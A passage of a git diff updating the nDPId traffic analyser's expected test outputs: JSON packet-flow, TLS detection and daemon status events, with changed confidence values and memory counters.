00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859884,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1421985541772} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1252380859942,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1421985541772} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoTo","breed":"Acceptable","category":"VoIP"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1544035479538} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1544035479538} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538} 00449{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479721} 00444{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768} 00723{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoTo","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1544035479768} +00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1544035479768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/9 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 1441 bytes -~~ total detected protocols..: 2 +~~ total detected protocols..: 1 ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874866 bytes -~~ total memory freed........: 5874866 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6008500 bytes +~~ total memory freed........: 6008500 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars -~~ json string max len.......: 950 chars +~~ json string max len.......: 951 chars ~~ json string avg len.......: 575 chars diff --git a/test/results/tls_long_cert.pcap.out b/test/results/tls_long_cert.pcap.out index fd7e86912..021ee9c47 100644 --- a/test/results/tls_long_cert.pcap.out +++ b/test/results/tls_long_cert.pcap.out @@ -4,10 +4,10 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.